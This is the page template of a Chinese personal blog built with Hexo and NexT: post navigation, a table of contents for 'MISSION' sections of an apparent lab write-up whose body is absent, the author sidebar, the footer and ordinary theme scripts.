    <a href="/2024/02/07/hmv-%E5%A4%8D%E7%9B%98HMVLabs-Chapter-1-Venus/" rel="prev" title="复盘HMVLabs Chapter 1: Venus">
      <i class="fa fa-chevron-left"></i> 复盘HMVLabs Chapter 1: Venus
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/02/20/sqli-lab-%E5%A4%8D%E7%9B%98/" rel="next" title="sqli-lab 复盘">
      sqli-lab 复盘 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x01"><span class="nav-number">1.</span> <span class="nav-text">MISSION 0x01</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x02"><span class="nav-number">2.</span> <span class="nav-text">MISSION 0x02</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x03"><span class="nav-number">3.</span> <span class="nav-text">MISSION 0x03</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x04"><span class="nav-number">4.</span> <span class="nav-text">MISSION 0x04</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x05"><span class="nav-number">5.</span> <span class="nav-text">MISSION 0x05</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x06"><span class="nav-number">6.</span> <span class="nav-text">MISSION 0x06</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x07"><span class="nav-number">7.</span> <span class="nav-text">MISSION 0x07</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x08"><span class="nav-number">8.</span> <span class="nav-text">MISSION 0x08</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x09"><span class="nav-number">9.</span> <span class="nav-text">MISSION 0x09</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x10"><span class="nav-number">10.</span> <span class="nav-text">MISSION 0x10</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x11"><span class="nav-number">11.</span> <span class="nav-text">MISSION 0x11</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x12"><span class="nav-number">12.</span> <span class="nav-text">MISSION 0x12</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x14"><span class="nav-number">13.</span> <span class="nav-text">MISSION 0x14</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x15"><span class="nav-number">14.</span> <span class="nav-text">MISSION 0x15</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x16"><span class="nav-number">15.</span> <span class="nav-text">MISSION 0x16</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x17"><span class="nav-number">16.</span> <span class="nav-text">MISSION 0x17</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#MISSION-0x18"><span class="nav-number">17.</span> <span class="nav-text">MISSION 0x18</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Todd"
      src="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
  <p class="site-author-name" itemprop="name">Todd</p>
  <div class="site-description" itemprop="description">把生命浪费在美好的实物上</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">34</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ghostlitao" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ghostlitao" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2019 – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Todd</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
